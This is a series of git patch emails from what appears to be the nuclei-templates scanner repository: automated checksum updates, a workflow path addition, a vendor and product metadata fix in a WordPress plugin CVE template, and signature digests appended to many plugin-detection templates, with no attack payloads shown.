http/cves/2022/CVE-2022-29272.yaml:0b04cec71a246d42c7cfd03d2e2146265691e3de http/cves/2022/CVE-2022-29298.yaml:dbb673cf30a552d25f26c4dfc4517001f5a6e919 http/cves/2022/CVE-2022-29299.yaml:1ca6e99d21f0cab9e13d0b8dd036d3a0c4870b06 @@ -2869,7 +2869,7 @@ http/cves/2022/CVE-2022-37191.yaml:0c57a701c1c9067c702ef5d40ca23448a58f6709 http/cves/2022/CVE-2022-37299.yaml:0a3f30c80ce167733cb1a4432f2090d7d8715a62 http/cves/2022/CVE-2022-3768.yaml:8c9f9736507f827359a08f4f70e83cfa05cd3e2a http/cves/2022/CVE-2022-3800.yaml:a700c9264ffbedb46a2f3a22ec7e98be500097c5 -http/cves/2022/CVE-2022-38131.yaml:a5c2f2aefcf564ac3a91c575c845e251d74cca4c +http/cves/2022/CVE-2022-38131.yaml:1e719c6442482728943b66e3a5efc442d34ce265 http/cves/2022/CVE-2022-38295.yaml:e935234c93f236f44ebedc6ec81801116b26d54b http/cves/2022/CVE-2022-38296.yaml:236c15b302eedb112d21bc64a388b0d716416755 http/cves/2022/CVE-2022-38322.yaml:a6dc529af3f38c615a3523546602018f81a14ed8 @@ -3066,7 +3066,7 @@ http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 http/cves/2023/CVE-2023-2356.yaml:83f12f25896993aaa17f815a0e62f12e24370a94 http/cves/2023/CVE-2023-23752.yaml:9d9d7f45b50837196c39fda7a218d094a42af504 -http/cves/2023/CVE-2023-24044.yaml:753635d5e77735d797f39a02dbf1d29f82c3738b +http/cves/2023/CVE-2023-24044.yaml:9bab143468ecb4a0d0fd833f3890c468ffcd4563 http/cves/2023/CVE-2023-24243.yaml:d8114d7e2422b334f5ac940ecd66811783da758c http/cves/2023/CVE-2023-24278.yaml:1d2306f9d9cb2d17f8e79ee9cac52005c5a55cfe http/cves/2023/CVE-2023-24322.yaml:2fd2be84af2595799fe334bc21a1d270f1c96ba2 @@ -3177,7 +3177,7 @@ http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e http/cves/2023/CVE-2023-34192.yaml:d0455d9800bb265d0a14eba0bacef50a7d87a37e http/cves/2023/CVE-2023-34259.yaml:29e00e6317898a17f5c645a1badf181d0b0644f9 -http/cves/2023/CVE-2023-34362.yaml:446814f5faf67a703db88c38de16a5fd7e5a5b55 +http/cves/2023/CVE-2023-34362.yaml:9138f9613e9e7aabb370f97e0959c219a737c588 http/cves/2023/CVE-2023-34537.yaml:0a82a06ab2f05e35b4cb238baff31f915ca7a864 http/cves/2023/CVE-2023-34598.yaml:0b38abd88b3fc2ac7790d931685f45cb92433619 http/cves/2023/CVE-2023-34599.yaml:0d749847fc42f3fc2a879d43fa3beecbd43b6091 @@ -3301,6 +3301,7 @@ http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf +http/cves/2023/CVE-2023-44393.yaml:ccfbbd5fa51425d34e26d7623c3fd84f17ae5f03 http/cves/2023/CVE-2023-4450.yaml:c0f6a278a989a4e11d99a1543fad5c999232eec8 http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c @@ -4870,7 +4871,7 @@ http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf9670 http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce http/exposures/backups/sql-server-dump.yaml:1d9af95edd46caa15f831d5d4673ecfd1282de99 -http/exposures/backups/zip-backup-files.yaml:02bab0fb9a7beaa1046a8e0c9a4d45d09a6c9d25 +http/exposures/backups/zip-backup-files.yaml:5dc1e74451d4ef11ac6d83f1050dfd0e0bfee4fe http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 @@ -6721,7 +6722,7 @@ http/osint/user-enumeration/streamelements.yaml:6821246757af75e3baf0e83bef9e14bd http/osint/user-enumeration/streamlabs.yaml:e540d2d4a6e63bbb092523de109532f2299d62d7 http/osint/user-enumeration/stripchat.yaml:e5ffd502df3207c6f822e9650df2aba6695bf788 http/osint/user-enumeration/subscribestar.yaml:ae74f99d8abc930a482c670a9156719829fa19ed -http/osint/user-enumeration/substack.yaml:d3bac898ab8d9811336cea17bc1f2fc88156ebd6 +http/osint/user-enumeration/substack.yaml:349347290d29f0358f751194904652af0d963b3c http/osint/user-enumeration/sukebeinyaasi.yaml:b458e02523c06e5be58d63bff6f1c8df1d4e04ef http/osint/user-enumeration/suzuri.yaml:e9e7db2b37c9e89d4adf5e2760015b789f6c4d43 http/osint/user-enumeration/szmerinfo.yaml:b47d621e787d6fbf43c3ce64352b75283030b4cb @@ -7741,8 +7742,8 @@ http/token-spray/api-rijksmuseum.yaml:cf949998f89c97e55141311f423d78de4900e5da http/token-spray/api-savepage.yaml:7e8a127814b65eab3c3153e6ff5aa06041c9143f http/token-spray/api-scanii.yaml:aa0debaddc5e927def28b3a8c73a544810a89c2d http/token-spray/api-scraperapi.yaml:77729d0b7a3b3045a6231a768fb3ea54b0636693 -http/token-spray/api-scraperbox.yaml:0a7657e0ac4bc53b88fb36a861b67831049be30b -http/token-spray/api-scrapestack.yaml:5bf86b2038203549460a6e2a94335e137cde42e0 +http/token-spray/api-scraperbox.yaml:73bc463d296c70483007d02fc99fb3ffd3f01578 +http/token-spray/api-scrapestack.yaml:eba9edd9c60da9db926f2eb7fba199e6d82300ce http/token-spray/api-scrapingant.yaml:2d74b7431770cddf7706e57347e79dbb09e42598 http/token-spray/api-scrapingdog.yaml:36ec01b41847600aa7f9ed05803dd8f4512f78b7 http/token-spray/api-screenshotapi.yaml:23811c030da5191d10880ff1ca3702e804d51738 @@ -7785,7 +7786,7 @@ http/token-spray/api-weglot.yaml:7bff21ee8b7aa9fe011d50ffaf4b8e03c531da73 http/token-spray/api-wordcloud.yaml:74f33bece9584161d811fd58977d4be8a92d25e7 http/token-spray/api-wordnik.yaml:a7d77ed3156f4ebe4c7c16329afc8ca6c5f3059e http/token-spray/api-youtube.yaml:4aa93c7e149ba16f89cd95fb0ed95d53904b6cc0 -http/token-spray/api-zenrows.yaml:7f083e728e4f02209b61a3c610cb865c990b4dc9 +http/token-spray/api-zenrows.yaml:eeb7bab267b524c60c8442813aaf92797d229ccd http/token-spray/api-zerbounce.yaml:f8791910350a1b497067ca416989c914f588d52e http/token-spray/api-zoomeye.yaml:1497726f625cb7f7ec99bb2d9da5740299054bf6 http/token-spray/google-autocomplete.yaml:83d7fc337042031cb3a7bd478cee07f3a40ebb19 @@ -8017,7 +8018,7 @@ http/vulnerabilities/other/bagisto-csti.yaml:dcc7c57c641a9a49e1e67ca561abce15742 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac http/vulnerabilities/other/beyond-trust-xss.yaml:541a6f90d60f4267863346d5ebe9e1083f234f62 -http/vulnerabilities/other/bitrix-open-redirect.yaml:c07fd013b41f1696f544842d55c1ee758c520bd2 +http/vulnerabilities/other/bitrix-open-redirect.yaml:51750492f2dc59f969ad0ae1b2c17f3ad691e98c http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:77169388e9064f1e08de2505a00c6d01b999ac44 http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml:366050c5044a7f40dd54529a409f4ef2a3aceff1 http/vulnerabilities/other/bullwark-momentum-lfi.yaml:4677beb1cf50189f15dddee0c2c36357df5f0c1a @@ -8707,7 +8708,7 @@ javascript/detection/ssh-auth-methods.yaml:c42ab280f2285a5cc2edcb75ba45bbebc0e01 javascript/enumeration/checkpoint-firewall-enum.yaml:8d7c249d110dbbe18e6dad9b67cb5f70d4fe5931 javascript/enumeration/ldap/ldap-metadata.yaml:02c4bddb6f9fc5cb5262f4f8cece729cf4fd6e95 javascript/enumeration/minecraft-enum.yaml:86520064cf23ae09b9ce6a2ec23f29abaeb9eb5e -javascript/enumeration/mysql/mysql-default-login.yaml:274d4679cd8683407f4367b417db11384fece171 +javascript/enumeration/mysql/mysql-default-login.yaml:c4f5fbbff87d63a92cc431d5e9af8cdd96c7abda javascript/enumeration/mysql/mysql-info.yaml:c1042c0700cad92e7b3329fe3d64be9914186c66 javascript/enumeration/mysql/mysql-show-databases.yaml:4f95912ebfb4374efd5c35f8c7d778278e6cf60b javascript/enumeration/mysql/mysql-show-variables.yaml:51219ecb4e9b349371d5cf858b8b365392670d85 @@ -8930,7 +8931,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9be23860ca25b0dad4adcc986716695a5950c7fa +templates-checksum.txt:9113fa9978698922df2698a9aacc781b7d4ccfb9 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From a072202a5217e008ce6989c73fa3dff2ca4c141b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Jul 2024 03:16:05 +0000 Subject: [PATCH 1698/1841] Auto Generated Templates Checksum [Mon Jul 29 03:16:05 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 934c68d157..895b77f51d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8696,7 +8696,7 @@ javascript/cves/2020/CVE-2020-7247.yaml:4b69f08fbef74779850f4ef8a81e91bfbf4a387a javascript/cves/2023/CVE-2023-34039.yaml:44c16d645d9008bce58aaff587f1c1780464946c javascript/cves/2023/CVE-2023-46604.yaml:c27b5604c33956e48e94c138aac183c87080d8d3 javascript/cves/2023/CVE-2023-48795.yaml:582b36cd13217b59d522114f7787b8f11ccd5c63 -javascript/cves/2024/CVE-2024-23897.yaml:0371995e15de94f3f3fd8723b83522f4b1c0f14f +javascript/cves/2024/CVE-2024-23897.yaml:c91a199da5f2ac965ee9e2210be6299164a1e48f javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:94bc6aea27f0f07f41834001f2efd51758a8ac2b @@ -8931,7 +8931,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9113fa9978698922df2698a9aacc781b7d4ccfb9 +templates-checksum.txt:93255318eb46029030767059d20d0c752906f6c5 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 6ced01eb288bf1e81056b6681516a9525bc214f0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 29 Jul 2024 03:16:08 +0000 Subject: [PATCH 1699/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 696d09af35..33b20392fb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/osint/user-enumeration/substack.yaml' workflow_dispatch: jobs: From 6267a5c596acaf01cd2c8155ca4f1ed6c56daffb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Jul 2024 08:46:31 +0530 Subject: [PATCH 1700/1841] Update CVE-2024-6205.yaml --- http/cves/2024/CVE-2024-6205.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 15488658e9..3af4486a2a 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -20,8 +20,8 @@ info: epss-percentile: 0.09301 metadata: max-request: 1 - vendor: PayPlus LTD - product: PayPlus Payment Gateway + vendor: payplus-ltd + product: payplus-payment-gateway framework: wordpress publicwww-query: "/wp-content/plugins/payplus-payment-gateway" tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment From 79542fce206e840c817745cb3747a9cd58876c56 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Jul 2024 03:17:22 +0000 Subject: [PATCH 1701/1841] Auto Template Signing [Mon Jul 29 03:17:22 UTC 2024] :robot: --- http/cves/2023/CVE-2023-44393.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2023/CVE-2023-44393.yaml b/http/cves/2023/CVE-2023-44393.yaml index c00e1b1801..1339946bef 100644 --- a/http/cves/2023/CVE-2023-44393.yaml +++ b/http/cves/2023/CVE-2023-44393.yaml @@ -58,3 +58,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d3cdb456930ddb1e8b6f7dcb0c7db22f66a8cb2cfe8994110bf9dfc1aff9c2ca0221009f7667a81a65a8e9e427ed696d8a4840bbec631885c76565b59a6dc71ba2e2d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..dcf8de9db7 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b318d87743d470cc4f3c71d24c6b50bbebad951b7d6048cc3435ce23f2260f9f022006cf2bbb983140d2091a8dfdb2a3cb106d5648356286167e41a4c58f1b4323a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..edcb77542e 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d87854079cd216681cc4a17ab70f426f54672c10d4b093330dc9ee15e55605a022100d15df8f6ebd5b25e24bc44d565ba45769759921611fbff9e15582b5ec7c156ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..a31dd63073 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220486a4048c4c3825401235be49b12fd75fd10a8ef53fb2f3e9464360c5f1f7027022100a6cd9a8c3abee0c72113d33d0e508d1570997bb963429e1db94de86c7c41a39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..5386e56c14 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 